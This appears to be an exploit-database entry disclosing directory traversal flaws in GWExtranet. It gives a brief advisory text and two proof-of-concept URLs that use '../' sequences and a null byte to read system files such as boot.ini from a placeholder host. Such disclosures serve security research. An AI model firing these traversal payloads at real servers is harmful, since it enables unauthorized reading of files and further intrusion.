GWExtranet - Multiple Directory Traversal Vulnerabilities

Author: joseph.giron13
type: webapps
platform: cgi
port: 
date_added: 2007-11-21  
date_updated: 2014-01-09  
verified: 1  
codes: OSVDB-38830  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 30795.txt  
source: https://www.securityfocus.com/bid/26525/info

GWExtranet is prone to multiple directory-traversal vulnerabilities because it fails to properly sanitize user-supplied input.

An attacker can exploit this vulnerability to retrieve arbitrary files from the vulnerable system in the context of the webserver process. Information obtained may aid in further attacks.

http://www.example.com/gwextranet/scp.dll/sendto?user=calendar+of+events&mid=474020FA.GWEMAIL_DEPOT.SDEPO.100.167656B.1.1B00.1&template=.././../../boot.ini%00
http://www.example.com/gwextranet/scp.dll/nbfile?user=calendar%20of%20events&format=&mid=46FA2724.GWEMAIL_DEPOT.SDEPO.100.167656B.1.198E.1&folder=Calendar&altcolor=cccccc&template=gwextra&caldays=1&startday=&file=../scp.dll